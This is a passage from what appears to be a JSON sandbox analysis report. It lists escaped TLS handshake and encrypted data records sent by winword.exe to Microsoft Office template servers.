  324.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x02 d$\\xea\\xceq\\xdc\\xefi\\x85;\\xb3\\x92\\xc0\\x1b\\x1e3\\x9e\\xc2z\\x82\\xdd0\\xb0\\xfd\\x80!\\x01ig\\xb1\\xb1\\x05\\xc9\\xf1\\x1fx\\xb0\\xe9l6\\x0c\\xda\\xddg\\x7f\\x95r\\xde-nw*u\\xff\\x9dz\\x81sd\\x8ctj\\xa4\\xf9!p`y\\x15%\\x0f\"l\\x08&\\xfb\\xb7\\xf9\\x1f\\xcd\\xa4\"k\\xcf\\xf8\\xbc\\xc7\\xeb\\x9e\\xc5\\x86\\xca\\xfc\\x8c\\xef\\xa4<-e\\xc9 \"ws\\xb4\\xd0\\x92\\xfb\\x00\\x81\\xd2\\xe0\\xf7k\\xdckl7\\xbcilm\\x18\\x04z\\xa7\\x14\\xd13x\\x85\\xcc\\xde=3\\xed\\x81\\x8a\\xe6\\xc8\\xd85\\x12(\\xec\\xd7\\x83=s\\xfd\\x7f\n\\x7f:\\xfe\\x83\\xb6\\xcf\\xf9\\xdb\\x9dy\\x05\\xc5d\\x1a'4p\\xcd1\\x04\\x17\\xc9)\\xa2jd\\x9f\\xf5\\xdb\\x83\\xb9|\\x10\\c\\xaa\\xc1g\\x87\\xbd\\x88if\\x06\\x05\\x19\\xdf\\xf3\\x8coqe\\xac~o`\\xfd\\xf8\\xd5\\x9bg\\x96ff\\xa5u\\xe0n{i\\x1b\\xa1\\x041a\\x98:\\x12\t\\xb1\\xdc\\xb7\\xd5\\xaf\\xf2\\x00ma\\xc8z\\xa7%\\xd3sq`\\xb9\\xca\\"
  325.             },
  326.             {
  327.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00}\\x01\\x00\\x00y\\x03\\x01]\t}\\x0f\\x7f\\x04j\ne\\x8f\\xb0\\x1a@\\x85\\x1d\\xe8\\x10\\xe1\\xda\\xb7f\\xc8]\\xef\\x04\\x139b_\\xe8\\xd8\\xef\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x008\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1f\\x00\\x1d\\x00\\x00\\x1atemplateservice.office.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  328.             },
  329.             {
  330.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04%\\x1a\\xcbu\\xc4\\xc3c\\xc7v\\xc4\\xc7\\x97l+\\xf3\\xc1\\x94$\\xa2\\xc4\\x00\\xd3{\\xc9x\\xb4\\x8d\\xde_\\xec`\\x12\\xae\\xfc\\x91\\x8d\\xdc\\x1a\\xbc\\xb6\\x9b\\xc4a\\xd9\\xa5r-\\x9e\\xc2\\x0b~\\xd7\\x03*\\xcf\\x06\\x0b\\x89\\xce\\xf9pq\"\\xb1\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xac\\xe8nj\\xaam\\x9b\\x1ac[\\x9a\\x90\\x8b\\x9f\\xb4\\xc8w\\xd0\\x1b\\xee\\x95\\x88tc\\x15\\x18\\x04'\\xe4\\xad)\\xa6ct\\xbc\\xa0\\xbb7\\xed\\xd4z\\x8b\\xc6\\xe8\\x1e\\x87\\x16t"
  331.             },
  332.             {
  333.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\xb8\\xcc\\x8a%w,\\xe7\\x9f\\x91;\\xe8q\\x0f\\xf0n\\xa2j\\xf0\\xachm\\xfa`\\xb2q\\xea\\xfd\\xe31w\\xb9\\xd1\\xb6\\x8a:8\\x0c\\x90\\xff\\xfb\\x9c%xd\\xd8\\xc2\\x85]\\xa9]\\x9a\\xe9\\x13i\\xb7\\xe3\\xe2\\xb0\\x8f\\xc4\\xbbqz\\xa7;\\xb5c[\\xb5\\xc0l8\\xb4+\\xdal\\xf5g[*\\xe6\\xc0)\\xf0b\\xb6\\xd1 \\x1bu\\x10\\xc7\\x12\\x1d\\x1fz@\\x1d\\xf8\\xc6\\xb0`\\xae\\xd2\\xdd\\x16\\xa3s\\xe2u\\xef\\xde\\xf6\\xecqy\\xfb\\xe2]\\xd0&\\x1e\\x89n\\x8f7ek\\x1be\\x8b\\xd8p\to\\x05{\\xbao@*\\xc8\\x8f\\xdc*a\\xce\\xc3f\"v\\x84\\x86\\xa2dkuje m\\xddi\\x10\\x9b\\x9a\\xa0\\xd7\\xc7\\xa5dv$3\\x89t\\x80\\x8e^\\xc1nkt\\x1a|\\x95\\x85\\x03\\xbf\\x1a$\\x93\\x13\\xc2\\x85{k\\x00@c\\xa9_n\\xe6\\xcc\\x95\\xcdw\\xde\\xc1\\x85i\\xb2\\xde\\xa9v2\\xea\\x83k\\xc0\\x04'\\xda\\x9e|\\x9c\\xec\\xbd=>\\xb1\\xe1\\x16\\xe3\\xde\\xed\\xdbe\\xa9\\x87u\\xdd\\xfe\\xfb\\x1e`\\x95r\\x15="
  334.             },
  335.             {
  336.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1dx9\\xa4g(\\xd3\\xc1\\xfbsy\\xf8hp\\xd7\\xfem@\\xf3m\\x9f\\x9c\\xa4\\x93ey'\\x93\\xbb\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  337.             },
  338.             {
  339.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1d\\xf6]\\x159\\xed\\xaa\\xd8\\xc6\\xcf*\\xcf\\xeb\\xfb\\xc4zpy\\xce`n\\xe1\\xec\\xcf\\xcb\\xb4|o.\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  340.             },
  341.             {
  342.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1d\\xee\\xc4\\x9d\\xef\\xc5\\x13<\\xd0\\xad\\x00t\\xd7\\xe6os\\xb5\\x91\\x13\\xd8\\xa1\\x8d\ru 4\\\\x9b}\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  343.             },
  344.             {
  345.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1d\\xc0)\\xbf\\xe1\\xea~\\xd7\\xda\\xc2\\xd4\\xa2[\\xf7\\xa8\\x8ct\\x04\\x02n\\x12\\xc0\\xf5\\xb2:\\x87\\xd7\\x93\\xa7\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  346.             },
  347.             {
  348.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1d\\xf9\\x01myf\\x9b\\xfc\\xf3\\xcf\\xea\\xe6\\xcf\\x9d\\x9a\\xd5\\x87\\xf8\\xc0,o\\x8d\\xcd\\xf4$\\xda|\\x15}\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  349.             },
  350.             {
  351.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1d\\x8b]\\x0c\\xc7\\xa2\\x0e\\x13i\\xc2\\x99\\x1a\\x80#\\xb0\\xf2\\xe8;\\xef\\x8fb \\xc1b\\x9b/\\x88~\\xca\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  352.             },
  353.             {
  354.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1do\\xb7\\x1b\\xcf\\xf5[*\\x08\\xc5?8@\\xad8\\xcbpz\\x15?\n\\x82u*)\\x08ep\\xae\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  355.             },
  356.             {
  357.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1d\\xea\\x01\\xb6\\xb6=tp\\xb01\\x81\\x13t\\x98\\xccm\\x7f\\xfd7\\xce_d\\xa3d\\xd4ipe\\xec\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  358.             },
  359.             {
  360.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1d\\x90\\x97\\xf8j\\x01\\xa0\\xb3\\xc5\\x8e\\xb8\\x13\\x91-xe8c\\x17\\xac\\x8ch\\xa8(\\xbe}\\xd3\n\\xa0\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  361.             },
  362.             {
  363.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04}\\x8d,\\xd8\\xe8\\x8ak\\xb6\\xff\\x0f\\xd4\\x06\\xeb\\xc9\\x97\\xea\\x98\\xf2\\xa3\\x84\\x9di\\x059\\xaa\\x01\\xc5\\x8a\\xdf\\xf1\\xa9g\\x16\\xbc.w\\x01u\\x05\\xe0:\\x8b\\xa8\\x03\\xe9\\xbc\\x8c?\\x06\\xef\\xae?\\xc3\\xbad|f\\xb1\\xbf\\x84\\xd8j\\x19\\xe6\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x0002\\#\\x8e,\\x95w\\x84\\xa9kf\\xc5\\x8biz\\xf7\\xd6:\\x01\\xe3(s46zc\\x93uz\\xda\\x99\\x164\\x8eq\\xc8s>\\x18\\x9c\\xbe\\xb4ff\\x14[\\xccx"
  364.             },
  365.             {
  366.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xce\\x8fe\\xc7\\x0e\\xa6\\xc9\\x85\\x93\\xee\\xddro\"\\xad+\\xcf\\xb4<\\xaf\\xaaxp\\xa1\\x0fy\\xaci\\xee|y\\xd5\\xb2i\\xf2\\xea\\x88\\xa6\\x8f}\\x04\\xb4\\x1a\\xeduciz\\x17\\xd2\\xeb\\xbd\\x9c\\xd9]7\\x1e\\x87c\\xberlkc\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000h@/\\xb3t\\xf1\\x01\\x93\\x1ao1\\x05c\\x99f\\xf9\\xa0\\xd2\\xd0\rw\\x19\\x10\\x8d$\\xcd\\x17\\xce\\x15\\x1f\\xf9\\xd0d\\x81\\xafq\\x15\\xc9\\xc2\\x112\\xdd\\xc5\\x85f\\x88\\x0eb"
  367.             },
  368.             {
  369.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1e\\x10\\xf9ew\\xdb\\x15-\\x94(o\\x8d3\\xa7\\xe2s\\xebn\\x14\\xaew\\xca\\xec\\xce\\x0f,w\\x86\\xc8\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  370.             },
  371.             {
  372.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1e\\x19ci\\x80\\x1de\\xf5m\\x7f\\xb6\\xc4\\x14\\xbfh\\x8c\\xcb\\xb0\\x1az\\xe4u\\xfe\\xe1\\x88/\\x02bh\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  373.             },
  374.             {
  375.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1ec\\xa8\\x1f 5\\xf0\\x8f\\x88\\xc7\\xf3p\\xa5\\x03\\xf0\\xaa\\xb85^8\\xd2\\xe6\\x1d\\xdd\\xe7\\x95\\xaa\\xc4\\xea\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  376.             },
  377.             {
  378.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1e\\x10\\x9f\\xd6\\xee\\x9ct\\xcfx\\x1f\\xb9@\\x88\\xbdp\\xfad%\\x85m=c\\xf9\\x81atx\\xd8\\xb9\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  379.             },
  380.             {
  381.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1e`\\x17\\xa9t>h\\x8d{\\x8a\\xcc\\xc0\\x9e\\xbc\\xc0\\xad\\x8c\\xe4\\xb4\\xbb6\\x1c\\x0f\\xff:\\xb5\\xe7\\x93\\xee\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  382.             },
  383.             {
  384.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1e\\x8f\\xd60\\x9dim\\x9a\\xfa\\xd1\\xdb\\x89\\x1f@\\xea\\xae\\x1a\\xf2\\x89=e\\x97\\xbave\\xf6s\\x92\\x04\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  385.             },
  386.             {
  387.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1e\\xa2\\x01\\xba\\xf3n\\x1a\\xacq\\xd4r#q\\x02\\x8c*\\xaa\\xebu\r\\xca\\x9a\\xa5\\xb5\\x94p\\xb0\\xc0\\xb5\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  388.             },
  389.             {
  390.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1e\\x1fx\\x9a\\xe2/\\xe8\\x91\\x89,v\\xd8\\xbam\\x03\\x9dz\\xe4\\xbc.a\\xae,\\xe4\\xe9\\x18\\xd1q4\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  391.             },
  392.             {
  393.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1e\\xbc\\xcd\\xecs\\xbe;\\xba\\xd0\\x10 rr\\xf2\\xf2\\xbe\r\\xbc:\\xf7\\xaf\\x7f1c\\xcfj\\xac\\xab\\xcf\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  394.             },
  395.             {
  396.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1e_\\x9c\\xc6\\x8c\\x8cs\\xa5/\\xf9\\xa2d9^\\xb6\\x97\\x941\\x05s@8\\xcbe\\xbea?p\\x15\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  397.             },
  398.             {
  399.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1e#\\x8c\\xf3\\xa1\\x9cr0\\xf9\r\\xec\\xa9\\xb4\\x9ci\\x88\\x81\\xce\\xe7\\xea\\xb1\\x98\\x8e\\x95\\x86\\xebr=\\x93\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  400.             },
  401.             {
  402.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1e\\x03\\x90\\x11i\\xe2_x\\x7f\\xc6\\xd7\\xce\\xf5\\x1a\\x85\\xb3\\xb7\\xe2iy`\\xe0\\x19 \\xc4\\xa19\\xb8\\xba\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  403.             },
  404.             {
  405.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x83\\xd9\\xe3/\\xf4\\xc11h%\\xe1\\x8b\\xcdw\\x10q\\xa4$\\x83\\xb9\\x0e\\x94\\xb8\tf\\xb5\\xf5\\xed[\\x00\\x12\\x05f\\xdd\\x95t\\x0cg\\xfa\\xb7\\xf0l\\x8ez\\x90\\x00\\x81\\x87$^^\\x94\\x9c?\\x97\\x9ao\\xeds\\xf3\"9\\xa0\\x11\\xa8\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xd7\\xc77(\\xbcd9\\xa4+\\x13\\xdc\\x19\\xd1\\x94v}\\xad\\x81p\\x86\\xea\\x19\\x1e\\xab\\xb4\\xbe$m\\x19\\xa4\\xad\\xfa\\xa1\\xfah\\xf8rlml \\x8e\\xa2\\x01\\xaax\\xa5b"
  406.             },
  407.             {
  408.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x1f\\x19\\xbf\\x94\\x82>-\\x8a\\x01mw\\x12|r\\xc1\\xa8\n\\xd6l\\xc2z\\xcae\\xf3\\xa5x\\xb6? \\x95\"\\x8a\\xbd\\xac\\x9d\\xabdc\\x16\\x8a\\xe9)q>\\xa3f\\xce\\xd0\\xbc\\xad\\xa4\\xcd%\\xe0\\xf3+\\xcez\\xcdcs\\xc7\\xb3z\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc8,\\x93\\xc6\\x95\\x84\\x9c\\x9cz\\xc8\\x18>\\x18\\xb3mhw\\xcf\\xe3\\xd2\\x90\\xf1\\xf3sfvru(\\xcaqv\\xcc\\xffb\\xf7\\xda\\x1c\\xa2er\\xa1i\\x04e\\x0e\\xec\\xd0"
  409.             },
  410.             {
  411.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa4\\xfc\\xc2\\x97dhf\\x8e\\xf8\\x92l\\x80\\xb2\\xd5b(l\\xed/\\xd8^\\xfd\\xd7\\xf8^\\xec\\xf1,\\xb8\\xc2\\x1fe>\\x160\\x9f?\\xceb\\xbe\\xde\\xb3\\x85n\\xdfm\\xc9z\\xb3\\x92_\\xfa\\x81\\xabgw\\x1c\\x8e\\xcf\\x13\\xe6\\xc5\\x05\\x17\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x1dm\\xc4\\xce\\xbd\\xa0n\\x85\\xb3\\xb6pes\\x88\\xa6>1) \\xb3\\xfan\\x11a\\xe1\\xcf\\xf5\\x83]\\x12\\xa0\\xa3\\xab%:\\x83p\\x99\\xc2v\\xeb^\\xf1~\\x9c\\xf3c\\x19"
  412.             },
  413.             {
  414.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1e\\x13o\\xfe\\xb2q{&\\x9f\\xef\\x9c\\xa4\\xa6>\\x8c\\x1b\\xf2\\xb8y7\\xa1bve\\x95\\x90\\x9a\\x8b\\xed\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  415.             },
  416.             {
  417.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x042\\x97\\xc6\\x85\\x16i\\x99\\x03~u\\x8e\\xbf^>\\xd8\\x15\\x00\\xd0\\x1a:\\xca\\x92\\xab\\x92\\x9ac\\x85\\xbc\\xf2\\x0f\\x98(\\xcc#\\xc6\\x89,7@\\xfe\\xf6\\xe5\\x00\\xc5\\xfa\\xe1\\xef~\\xa2\\x06cv\\x86\\xfd\\x81\\x9d\\x0c\\xaa\\x8bl$\\xae\\xdd\\xda\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000dt\\x97\\x9b\\x98\\x83\\x08i^\\xf6n`\\xed\\x1d\\xb4\\x83}\\xcc\\xf8\\xc3sw\\x91\\xab\\xd9\\x9fr\\xf5\\x9dy-\\xf0\\x17\\xf4@\\xd1\\x08\\xff,m\\xb0\\xb9\"\\xda\\x04\\xb0!\\xcf"
  418.             },
  419.             {
  420.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x1be\\xf4\\x1a\\xadn\\xe7\\xfeb\\xe7zm\\x01\\xd5\\xabv\\xbd&u'*\\xa1\\\\x16ax\\xa5\\xb2\\xfdm\\xefdl\\xc8l\\x0e\\x84\\xf4\\x19{\\xbf\\xb9e\\xd35\\xcb\\x9b\\xd2\\x01\rk\\xfc\\x13h\\xdf\\xe0y\\xe7\\xe2\\x15}\\xee\\xc2\\xb3\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000z\\xa9m\\xfd\\xf1\\xf6al\\x90\\xed\\x9a}k8(\\xdb\\x15\n\\xfd*t\\xc1?\\x84\\x03\\x04\\x13#2\\xd9\\xc7\\xfe*sr^\\x82\\xd7\t\\xffs\\xb6\\xbd\\xe0\\xeeg\\x89\\x0b"
  421.             },
  422.             {
